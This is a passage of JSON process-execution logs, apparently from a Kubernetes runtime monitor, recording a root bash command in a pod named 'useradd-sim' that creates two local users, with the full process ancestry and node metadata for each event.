inInitTree","start_time":"2025-09-17T18:20:11.263423935Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":1,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0Nzg0MjY2OTY4OjExMjU0MjE=","tid":1125421,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0Nzg0MjY2OTY4OjExMjU0MjE=","pid":1125421,"uid":0,"cwd":"/","binary":"/usr/bin/bash","arguments":"-lc \"useradd -m -s /bin/bash demo_user && adduser --disabled-password --gecos \"\" demo_user2\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-17T18:20:11.217484691Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":1,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjEwODAxNjQ3OjExMjUzNDI=","tid":1125421,"in_init_tree":true},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjEwODAxNjQ3OjExMjUzNDI=","pid":1125342,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-17T18:20:11.044018690Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjAyNzU2OTMxOjExMjUzMzM=","tid":1125342,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjAyNzU2OTMxOjExMjUzMzM=","pid":1125333,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c start","flags":"execve clone","start_time":"2025-09-17T18:20:11.035974122Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":1125333,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-17T18:20:11.333603425Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0ODk4OTE5ODk1OjExMjU0NTY=","pid":1125456,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-c \"\"$@\" >/dev/null 2>&1\" -- /usr/sbin/zsysctl userdata create demo_user2 /home/demo_user2","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-17T18:20:11.332137299Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":29,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0ODMwMjA2MzE4OjExMjU0MjE=","tid":1125456,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0ODMwMjA2MzE4OjExMjU0MjE=","pid":1125421,"uid":0,"cwd":"/","binary":"/usr/sbin/adduser","arguments":"/usr/sbin/adduser --disabled-password --gecos  demo_user2","flags":"execve rootcwd inInitTree","start_time":"2025-09-17T18:20:11.263423935Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":1,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0Nzg0MjY2OTY4OjExMjU0MjE=","tid":1125421,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0Nzg0MjY2OTY4OjExMjU0MjE=","pid":1125421,"uid":0,"cwd":"/","binary":"/usr/bin/bash","arguments":"-lc \"useradd -m -s /bin/bash demo_user && adduser --disabled-password --gecos \"\" demo_user2\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-17T18:20:11.217484691Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":1,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjEwODAxNjQ3OjExMjUzNDI=","tid":1125421,"in_init_tree":true},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjEwODAxNjQ3OjExMjUzNDI=","pid":1125342,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-17T18:20:11.044018690Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjAyNzU2OTMxOjExMjUzMzM=","tid":1125342,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjAyNzU2OTMxOjExMjUzMzM=","pid":1125333,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c start","flags":"execve clone","start_time":"2025-09-17T18:20:11.035974122Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":1125333,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-17T18:20:11.332136839Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0ODcxNjMxMjQ0OjExMjU0NDk=","pid":1125449,"uid":0,"cwd":"/","binary":"/sbin/useradd","arguments":"-d /home/demo_user2 -g demo_user2 -s /bin/bash -u 1001 demo_user2","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-17T18:20:11.304848532Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":22,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0ODMwMjA2MzE4OjExMjU0MjE=","tid":1125449,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0ODMwMjA2MzE4OjExMjU0MjE=","pid":1125421,"uid":0,"cwd":"/","binary":"/usr/sbin/adduser","arguments":"/usr/sbin/adduser --disabled-password --gecos  demo_user2","flags":"execve rootcwd inInitTree","start_time":"2025-09-17T18:20:11.263423935Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":1,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0Nzg0MjY2OTY4OjExMjU0MjE=","tid":1125421,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0Nzg0MjY2OTY4OjExMjU0MjE=","pid":1125421,"uid":0,"cwd":"/","binary":"/usr/bin/bash","arguments":"-lc \"useradd -m -s /bin/bash demo_user && adduser --disabled-password --gecos \"\" demo_user2\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-17T18:20:11.217484691Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":1,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjEwODAxNjQ3OjExMjUzNDI=","tid":1125421,"in_init_tree":true},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjEwODAxNjQ3OjExMjUzNDI=","pid":1125342,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-17T18:20:11.044018690Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjAyNzU2OTMxOjExMjUzMzM=","tid":1125342,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjAyNzU2OTMxOjExMjUzMzM=","pid":1125333,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c start","flags":"execve clone","start_time":"2025-09-17T18:20:11.035974122Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":1125333,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-17T18:20:11.304848205Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0ODU4MzYzNTAzOjExMjU0NDM=","pid":1125443,"uid":0,"cwd":"/","binary":"/sbin/groupadd","arguments":"-g 1001 demo_user2","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-17T18:20:11.291580783Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":16,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0ODMwMjA2MzE4OjExMjU0MjE=","tid":1125443,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0ODMwMjA2MzE4OjExMjU0MjE=","pid":1125421,"uid":0,"cwd":"/","binary":"/usr/sbin/adduser","arguments":"/usr/sbin/adduser --disabled-password --gecos  demo_user2","flags":"execve rootcwd inInitTree","start_time":"2025-09-17T18:20:11.263423935Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":1,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0Nzg0MjY2OTY4OjExMjU0MjE=","tid":1125421,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0Nzg0MjY2OTY4OjExMjU0MjE=","pid":1125421,"uid":0,"cwd":"/","binary":"/usr/bin/bash","arguments":"-lc \"useradd -m -s /bin/bash demo_user && adduser --disabled-password --gecos \"\" demo_user2\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-09-17T18:20:11.217484691Z","auid":4294967295,"pod":{"namespace":"default","name":"useradd-sim","container":{"id":"containerd://651a08e619a057b73bb03340fed89e4389e982427dc8e62c3306a02c804abbf5","name":"useradd-sim","image":{"id":"docker.io/library/ubuntu@sha256:4e0171b9275e12d375863f2b3ae9ce00a4c53ddda176bd55868df97ac6f21a6e","name":"docker.io/library/ubuntu:22.04"},"pid":1,"security_context":{}},"pod_labels":{"run":"useradd-sim"},"workload":"useradd-sim","workload_kind":"Pod"},"docker":"651a08e619a057b73bb03340fed89e4","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjEwODAxNjQ3OjExMjUzNDI=","tid":1125421,"in_init_tree":true},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjEwODAxNjQ3OjExMjUzNDI=","pid":1125342,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-17T18:20:11.044018690Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjAyNzU2OTMxOjExMjUzMzM=","tid":1125342,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0NjAyNzU2OTMxOjExMjUzMzM=","pid":1125333,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 374777574d8a5ad741d8c2d23349b1ad27b81a8286028b4ec699165ffe73429c start","flags":"execve clone","start_time":"2025-09-17T18:20:11.035974122Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":1125333,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-17T18:20:11.291580488Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMDMzOTg0ODMwMjA2MzE4OjExMjU0MjE=","pid":1125421,"uid":0,"cwd":"/","binary":"/usr/sbin/adduser","arguments":"/usr/sbin/adduser --disabled-password --gecos  demo_user2","flags":"execve rootcwd 